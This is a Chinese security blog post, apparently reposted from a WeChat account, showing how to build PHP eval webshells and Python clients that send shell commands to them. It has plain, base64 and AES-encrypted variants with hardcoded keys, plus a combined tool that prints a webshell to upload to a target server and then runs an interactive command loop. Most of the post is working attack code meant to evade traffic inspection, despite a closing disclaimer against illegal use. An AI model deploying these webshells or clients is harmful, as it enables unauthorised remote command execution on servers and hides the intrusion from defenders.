python连接PHP木马^加密传输数据

admin 2022年6月27日07:52:50评论26 views字数 4091阅读13分38秒阅读模式

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系刘一手。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

环境

phpstudy、python3.8

1、普通木马数据传输

新建一个webshell.php文件,内容为一句话木马

<?php @eval($_POST['pass']);?>

python连接PHP木马^加密传输数据python编写一个接发端

import requests
url=input('webshell_url:')
pwd=input('webshell_pwd:')
proxy = {
'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080'
}
while True:
cmd=input('$')
if cmd == 'exit':
exit()
send = "system('" + cmd + "');"
data={pwd:send}
r=requests.post(url=url,data=data,proxies=proxy)
print(r.text)

效果如下python连接PHP木马^加密传输数据burp抓包进行查看python连接PHP木马^加密传输数据发现是原始的没有经过任何加密的数据传输

2、base64加密数据传输

新建一个webshell.php文件,内容如下

<?php @eval(base64_decode($_POST['pass']));?>

python编写一个接发端

import requests,base64
url=input('webshell_url:')
pwd=input('webshell_pwd:')
proxy = {
'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080'
}
while True:
cmd=input('$')
if cmd == 'exit':
exit()
send = "system('" + cmd + "');"
base64_send= base64.b64encode(send.encode('utf-8'))
data1={pwd:base64_send}
r=requests.post(url=url,data=data1,proxies=proxy)
print(r.text)

效果如下python连接PHP木马^加密传输数据通过burp进行抓包查看python连接PHP木马^加密传输数据发现传输数据是经过base64加密的python连接PHP木马^加密传输数据

3、AES加密数据传输

新建一个webshell.php文件,内容如下

<?php
$key='woshinibaba66666';
$vi='nishiwoerzi66666';
$rce=openssl_decrypt(base64_decode($_POST['pass']), "AES-128-CBC",$key,OPENSSL_RAW_DATA,$vi);
$cmd=base64_decode($rec);
@eval($rce);
?>

python编写一个接发端

import requests,base64
from Crypto.Cipher import AES
BLOCK_SIZE = 16
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
key='woshinibaba66666'
vi='nishiwoerzi66666'
def AES_Encrypt(key, data):
data = pad(data)
cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
encryptedbytes = cipher.encrypt(data.encode('utf8'))
encodestrs = base64.b64encode(encryptedbytes)
enctext = encodestrs.decode('utf8')
return enctext
def AES_Decrypt(key, data):
data = data.encode('utf8')
encodebytes = base64.decodebytes(data)
cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
text_decrypted = cipher.decrypt(encodebytes)
text_decrypted = unpad(text_decrypted)
text_decrypted = text_decrypted.decode('utf8')
print(text_decrypted)
return text_decrypted
if __name__ == '__main__':
url = input('webshell_url:')
pwd = input('webshell_pwd:')
proxy = {
'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080'
}
while True:
cmd=input('$')
if cmd == 'exit':
exit()
send = "system('" + cmd + "');"
data1={pwd:AES_Encrypt(key,send)}
r=requests.post(url=url,data=data1,proxies=proxy)
print(r.text)

效果如下python连接PHP木马^加密传输数据通过burp抓包查看数据python连接PHP木马^加密传输数据利用AES在线解密进行查看,数据传输是经过AES-CBC加密的 

在线解密网址:http://tool.chacuo.net/cryptaespython连接PHP木马^加密传输数据

整合代码

import requests,base64
from Crypto.Cipher import AES
BLOCK_SIZE = 16
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
key='woshinibaba66666'
vi='nishiwoerzi66666'
def AES_Encrypt(key, data):
data = pad(data)
cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
encryptedbytes = cipher.encrypt(data.encode('utf8'))
encodestrs = base64.b64encode(encryptedbytes)
enctext = encodestrs.decode('utf8')
return enctext
def AES_Decrypt(key, data):
data = data.encode('utf8')
encodebytes = base64.decodebytes(data)
cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
text_decrypted = cipher.decrypt(encodebytes)
text_decrypted = unpad(text_decrypted)
text_decrypted = text_decrypted.decode('utf8')
print(text_decrypted)
return text_decrypted
if __name__ == '__main__':
print('----------------')
print('|1:普通传输 |n|2:base64加密传输|n|3:AES加密传输 |')
print('----------------')
print('说明:选择生成对应的webshell传到目标服务器')
use=input('[+] choice:')
if use =='1':
print("""<?php @eval($_POST['pass']);?>""")
if use =='2':
print("""<?php @eval(base64_decode($_POST['pass']));?>""")
if use =='3':
print("""<?php $key='woshinibaba66666';$vi='nishiwoerzi66666';$rce=openssl_decrypt(base64_decode($_POST['pass']), "AES-128-CBC",$key,OPENSSL_RAW_DATA,$vi);$cmd=base64_decode($rec);@eval($rce);?>""")
con=input('[+] continue(yes/no):')
if con =='no':
exit()
if con=='yes':
url = input('[+] webshell_url:')
pwd='pass'
while True:
data=''
cmd=input('[-] $:')
if cmd == 'exit':
exit()
send = "system('" + cmd + "');"
if use =='1':
data = {pwd:send}
if use =='2':
base64_send = base64.b64encode(send.encode('utf-8'))
data = {pwd: base64_send}
if use=='3':
AES_send=AES_Encrypt(key,send)
data={pwd:AES_send}
r=requests.post(url=url,data=data)
print(r.text)

推 荐 阅 读




python连接PHP木马^加密传输数据
python连接PHP木马^加密传输数据
python连接PHP木马^加密传输数据

欢 迎 加入学习





机器人md5解密丫

python连接PHP木马^加密传输数据

python连接PHP木马^加密传输数据

python连接PHP木马^加密传输数据


原文始发于微信公众号(鹏组安全):python连接PHP木马^加密传输数据

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月27日07:52:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   python连接PHP木马^加密传输数据https://cn-sec.com/archives/1142631.html

发表评论

匿名网友 填写信息